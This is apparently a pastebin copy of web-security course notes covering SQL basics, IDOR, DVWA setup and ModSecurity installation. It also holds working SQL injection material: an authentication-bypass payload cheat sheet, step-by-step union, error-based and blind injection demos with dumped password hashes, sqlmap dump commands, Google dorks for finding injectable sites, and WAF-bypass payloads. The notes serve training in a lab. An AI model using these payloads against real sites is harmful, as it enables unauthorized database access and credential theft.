- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- https://cybermap.kaspersky.com/
- https://www.fireeye.com/cyber-map/threat-map.html
- DBMS
- ====
- DataBase Management System
- --------------------------
- Where, how, when which data is suppose to be stores in which table, in which database, in which column.
- DBA --> Database Administrator
- The Administrator of database, which manages the whole environment's database. DBA need to have the complete knowledge of a programing languages --> SQL
- SQL --> Structured Query Language.
- This is the programing languages which is used by the dba or any user to interact with the database.
- Source --> Delhi
- Destination --> Jalandhar
- Date --> 10/6/2018
- Class -> 2T
- Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES (Prashant, 10000, Roshan Garden Najafgarh, M);
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- Update <table_name> SET <value to change> where <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on any login form and gain teh access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the value is false, then the ans will be flase
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the value is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single inverted Comma ---> Use to break the SQL query
- 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Cupons| Promo Code ---> 1'or'1'='1
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- LVS setup
- =========
- Lucideus Vulnerable Simulator
- =============================
- DVWA --> Damm Vulnerable Web Application
- ----------------------------------------
- Open Source
- LVS_1.zip
- 1. Copy the zip file
- 2. Paste it in C:xampphtdocs
- 3. Extract the zip file
- LVS_1
- 4. Start the xampp server
- Apache
- MySQL
- 5. Start the browser
- 127.0.0.1/lvs_1
- 6. Click on the link --> lvs111
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 10
- ==========
- Insecure Direct Object References
- ---------------------------------
- A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
- www.bank.com/aofn/akjf.php?id=12 ---> Account1
- www.bank.com/aofn/akjf.php?id=11 ---> Account2
- www.bank.com/aofn/akjf.php?id=10 ---> Account3
- if I will change the id value to another ID value, and can have the access of another account, it is considered to be Insecure Direct Object References
- http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
- User ID = 1
- Username = Admin
- Password= password
- If I change the value of .php?Id=1 to .php?Id=2, then I can have the access of another account whose ID is 2
- Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
- Oyorooms.com/afogn/adifn.php?ID=admin.php
- id = 1 ---> 1 represents a token containing a value of --> Username, password and other information.
- Get Parameter
- -------------
- php?Id=1 -->
- Something = something
- Sensitive Data Exposure
- =======================
- Personal Data
- Credential Data
- Banking Data
- Economical Data
- Financial Data
- 1. When data is transmitted in the url, that is your crendentials are transmitted via GET Parameter.
- username=user&password=pass&sumbit=submit
- 2. When data is stored in plain text form rather then hashed or encrypted form.
- 3. When data is stored in the text file rather then to be stored in the databsae.
- Id Interest Gender Username Password
- -----------------------------------------------
- 1 Badminton Female admin Pa$$woRd
- 2 Football Male admin2 paSSwOrd
- Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.
- DVWA
- ====
- Damn Vulnerable Web Application
- -------------------------------
- It is a web application which is Vulnerable by default. This application is used for testing the skills and to perform web application attacks passed by OWASP.
- Could not connect to the database - please check the config file.
- 1. Goto c:xampphtdocsdvwadvwa-1.0.8
- 2. Open the config folder
- 3. config.inc.php
- 4. $_DVWA = array();
- $_DVWA[ 'db_server' ] = 'localhost';
- $_DVWA[ 'db_database' ] = 'dvwa';
- $_DVWA[ 'db_user' ] = 'root';
- $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- $_DVWA[ 'db_password' ] = '';
- save the file
- Username:admin
- password:password
- SQL Injections
- ==============
- Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
- SQLi
- UNION BASED SQL INJECTION
- =========================
- Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.
- DEMO
- ====
- DVWA ---> Security:Low
- SQL Injection
- Step 1
- ======
- To find 'GET' parameter.
- something=something
- php?id=something
- php?id=cat
- php?id=1
- php?id=query
- Either you click on some link of the web application|site or enter something in the search box.
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 2
- ======
- To generate a SQL error, to break the query.
- 1
- 1'
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
- You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
- 'select * from table '
- 'select * from table' '
- Step 3
- ======
- To count the number of columns, in the web application.
- For counting the number of columns, I will use order by
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 1
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
- Gives me error
- Unknown column '3' in 'order clause'
- This query means that I am asking the database to arrange the data according to column number 3
- But there is no column number 3 --> so it will generate an error
- order by n--+
- n starts from 1 and ends when i receive an error for the value of n
- --+ ---> To comment out
- if there is any data passed down after --+, it will not execute at all.
- There are 2 columns, in the database.
- Step 4
- ======
- To merge the data of all the columns, using UNION command.
- union select 1,2,...,n-1--+
- n=3
- union select 1,2--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- ID: 1' union select 1,2--
- First name: admin
- Surname: admin
- ID: 1' union select 1,2--
- First name: 1
- Surname: 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- database() --> database name
- version() --> Database Version Number
- ID: 1' union select database(),version()--
- First name: admin
- Surname: admin
- ID: 1' union select database(),version()--
- First name: dvwa
- Surname: 10.1.25-MariaDB
- Step 5
- ======
- To call database ki ma --> information_schema, for getting the information about the table names
- Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
- information_schema.tables
- |-> It stores the name of all the table names in the database.
- union select table_name,2 from information_schema.tables--+
- or
- union select 1,table_name from information_schema.tables--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Step 6
- ======
- I will again call database ki maa for columns names in the table names as users
- information_schema
- information_schema.columns
- union select 1,column_name from information_schema.columns where table_name="users"--+
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: admin
- Surname: admin
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user_id
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: first_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: last_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: password
- column name --> user_id
- first_name
- Last_name
- user
- password
- Step 7
- ======
- To retreive data from the above data.
- DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
- union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
- 1
- admin
- admin
- admin
- 5f4dcc3b5aa765d61d8327deb882cf99
- 2
- Gordon
- Brown
- gordonb
- e99a18c428cb38d5f260853678922e03 --> abc123
- 3
- Hack
- Me
- 1337
- 8d3533d75ae2c3966d7e0d4fcc69216b --> charley
- 4
- Pablo
- Picasso
- pablo
- 0d107d09f5bbe40cade3de5c71e9e9b7
- 5
- Bob
- Smith
- smithy
- 5f4dcc3b5aa765d61d8327deb882cf99
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 11
- ==========
- ERROR BASED SQL INJECTION
- ==========================
- Error based SQL Injection is type of SQL Injection technique to make the error message show Data in just the form of Database Errors instead of SQL Syntax error like in Union Based, for when we have a blind vulnerability that shows error, so we can extract sensitive data from the database directly.
- The errors are very useful during the time of development of a web application but they should be disabled on a Live Website, because errors always shows the Internal Sensitive Data of the Database.
- Error Based SQL Injection works on the ASP Technology (asp.net , aspx) which is a open source server side web application Developed by Microsoft, using the Microsoft MSSQL Server.
- TRUE CONDITION :
- ---------------
- Here 1 is True and 0 is False.
- AND GATE REPRESENTATION
- A | B | Resultant |
- ------------------------------|
- 0 | 0 | 0 |
- 0 | 1 | 0 |
- 1 | 0 | 0 |
- 1 | 1 | 1 |
- Checking the Last True Condition it states :
- 1 & 1 = 1 ie; 1*1=1 or True*True = True
- MAKING THIS TRUE CONDITION FALSE
- 1 & 0 = 0 ie; 1*0=0 or True*False = False
- Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.
- DEMONSTRATION
- ===============
- Normally a SQL Syntax can goes like :
- ?id=10 | ?id=10 and 1 =1 ; //TRUE
- Which means a Condition is true and it will revert a Genuine Website.
- - So, we can change and can create a Error in the SQL Command by :
- ?id=10 and 1=0; //FALSE
- Which will create and revert a Errors of the Database.
- CONDITIONS OF ERROR BASED SQLI
- ===============================
- = Only One Query can execute at a Particular time, not like finding out the Table Names etc we do on Union Based.
- = It works on the basis of Last In First Out (LIFO).
- = Only the Top Table of the Database can be accessed at a single particular time. Same goes for Columns and then for Rows.
- ----
- First as same as Union Based SQLI, we start finding the number of columns and the Vulnerable column. Suppose the vulnerable column is 10.
- After creating a Error, We will start executing the command and extracting the data from the First Table from the Database.
- For selecting the Top First Table (Cause we cannot directly go a “n” number column),
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables
- This will extract and give the Data of the First Table from the Database Including its name and other entities. If the Data is Juicy then extract it, else we go for the next tables and columns.
- ----
- For deselecting the Top/Current Table and selecting/extracting the next table,
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“Name of the previous tables”)
- Here we are selecting the next Top Table excluding the Previous one and then extracting its data through the Database Errors. For eg. if the First Top Table is named as “Images”, the query will be :
- ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“images”, "guestbook")
- ----
- After getting through our Juicy Table, we go for the data which are situated in there columns.
- = ?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in (“images”)
- Here we get the data of the extracted of the Columns which are not of the Table named Images.
- DEMO
- ====
- http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+
- http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
- we Will Get The Version Printed on The WebPage
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Here is Our Query To Get The Database.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now We Have To Get The Tables. As We Want Tables From Primary Database .
- Here Is The Query For Tables From Primary Database.
- Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1 Until You Get Your Desired Table Name .
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now We Have to Get The Column Names From The Table Name. We Got Table Of Admin. So Lets Get The Columns From Table Admin . Here Is The Query For Getting Column Names From The Table Admin.
- To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
- Here Is that PART in Our Query.
- Table_name=ADMIN
- Here Is The HEX Value of ADMIN=61646d696e
- And Put it With 0x to Build Our Correct Query.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 until we Get The Column Name Like Username and Password.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- After We Get The Column names Like Username And Password. Next Step Is To Extract Data From These Columns.
- WE Put The TABLENAME=Admin
- And
- Column_name_1=username
- Column_name_2=password
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- STACKED QUERY SQL INJECTION
- ============================
- Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.
- This can done by SQL Injection Automated Tools like “SQLMAP” etc.
- SQLMAP --> Python based Command Line TOOL for automate sql injection
- http://sqlmap.org/
- Python 2.7 --> https://www.python.org/download/releases/2.7/
- HAVIJ --> Illegal tool, GUI based
- SQLMAP
- ======
- 1.
- sqlmap.py
- 2. To test if the website id up or not or if it is vulnerable or not
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
- 3. To get the database ----> --dbs
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs
- available databases [2]:
- [*] acuart
- [*] information_schema
- 4. To get the tables
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables
- Database: acuart
- [8 tables]
- +-----------+
- | artists |
- | carts |
- | categ |
- | featured |
- | guestbook |
- | pictures |
- | products |
- | users |
- +-----------+
- 5. To get the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns
- Database: acuart
- Table: users
- [8 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | address | mediumtext |
- | cart | varchar(100) |
- | cc | varchar(100) |
- | email | varchar(100) |
- | name | varchar(100) |
- | pass | varchar(100) |
- | phone | varchar(100) |
- | uname | varchar(100) |
- +---------+--------------+
- 6. To dump the data from the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump
- Database: acuart
- Table: users
- [1 entry]
- +------------+-------+------+
- | name | uname | pass |
- +------------+-------+------+
- | John Smith | test | test |
- +------------+-------+------+
- HAVIJ
- =====
- GUI Based tool
- Google Dorks
- ============
- Advance Google Searching Techniques
- -----------------------------------
- Google Hacking Database.
- Arijit Singh
- When ever we search anything on google, google seach enging shows us the data into 3 different colors.
- Blue --> Headings --> Titles
- Green -> Links and urls
- Black -> Content
- intitle: inception
- inurl: inception
- intext: inception
- title--> movie
- url --> inception
- intitle:movie and inrul:inception
- indexof:/inception
- hacking filetype:pdf
- SQL Injection Vulnerable Web Sites
- ----------------------------------
- inurl:php?id=
- inurl:/view/viewer_index.shtml
- Session 12
- ==========
- Introduction to Firewall
- ------------------------
- Firewall
- --------
- It is an extra security layer, which helps me securing our web application and web site. It acts as the middle layer between the data transmission of user and the server.
- Firewall act as the filter. It filters the unwanted packets and malicious packets. Firewall works on the basis of signature and permutation and combination of queries which are transmitted by the user. Knowledgebase --> It acts just like database for signatures and combinations.
- There are two types of firewall:
- 1. Software Solution Firewall
- 2. Hardware Solution Firewall
- Software Solution Firewall
- --------------------------
- These are the softwares which are installed in the server.
- Microsoft windows Firewall
- Hardware Solution Firewall
- --------------------------
- They are the hardwares, which act as the man in the middle, and filters the packet which are malicious.
- MOD Security
- WAF --> Web Application Firewall
- --------------------------------
- MOD Security
- ------------
- Installation of Mod Security
- ============================
- Installing and configuring ModSecurity
- Step 1: open terminal and type
- $ apt-get update
- $ apt-get upgrade
- $ apt-get install apache2
- Step 2: $ sudo apt-get install libapache2-modsecurity
- Step 3: Now we need to place a modsecurity.conf configuration file into the /etc/modsecurity
- $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
- now open
- $ sudo nano /etc/modsecurity/modsecurity.conf
- Find this line:
- SecRuleEngine DetectionOnly
- and change it to:
- SecRuleEngine On
- Step 4: now check the apache2 log directory:
- $ ls /var/log/apache2
- You should see three files: access.log, error.log and other_vhosts_access.log.
- Now restart the apache2 service and check this directory again
- $ sudo service apache2 reload
- $ ls /var/log/apache2
- A new log called modsec_audit.log was created
- Step 5: now check the modsecurity-crs direcotry
- $ ls /usr/share/modsecurity-crs/
- the directories: activated_rules, base_rules, experimental_rules and optional_rules
- Step 6: for activate all of the rules in the base_rules and optional_rules directories so execute the following commands in a terminal:
- $ cd /usr/share/modsecurity-crs/base_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd optional_rules
- $ cd /usr/share/modsecurity-crs/optional_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd experimental_rules
- $ cd /usr/share/modsecurity-crs/experimental_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
- $ sudo nano /etc/apache2/mods-available/security2.conf
- At the end of the file just before </IfModule> enter the following lines:
- Include "/usr/share/modsecurity-crs/*.conf"
- Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
- save it
- Step 8: We must enable the headers module, this allows ModSecurity to control and modify the HTTP headers for both requests and responses.
- $ sudo a2enmod headers
- Now restart apache:
- $ sudo service apache2 restart
- cd /etc/apache2/sites-available
- ls ---> 000-default.conf
- sudo nano 000-default.conf
- edit
- ProxyPass --> Web application IP
- ProxyPassReverse --> Web application IP
- save and exit
- sudo service apache2 restart
- Bypassing MOD_SECURITY
- ======================
- union select 1,2--+
- Block
- Mix Cases
- UnIoN SeLeCt 1,2--+
- Inline Executable Comments
- /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- /*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+
- BLIND SQL INJECTION
- ===================
- Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response. This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi. This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
- 1. Blind Boolean
- 2. Time Based SQL Injection
- http://newsletter.com/items.php?id=2
- ------------------------------------
- select title,description from items where id=2
- ----------------------------------------------
- http://newsletter.com/items.php?id=2 and 1=2
- select title,description from items where id=2 and 1=2
- Demo
- ====
- 1
- 1'
- 1' and 1=0 # ---> False
- 1' and 1=1 # ---> True
- 1' and 1=0 order by 1 # --> No Result ---> Generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- 1' and 1=1 order by 2 # ---> Result
- 1' and 1=0 order by 3 # ---> No Result
- 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
- 1' and 1=0 union select 1,2 #
- ID: 1' and 1=0 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=1 union select 1,2 #
- ID: 1' and 1=1 union select 1,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=0 union select NULL,2 # --> nO dATA
- 1' and 1=1 union select null,2 #---> Shows Data
- ID: 1' and 1=1 union select null,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select null,2 #
- First name:
- Surname: 2
- 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=4 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement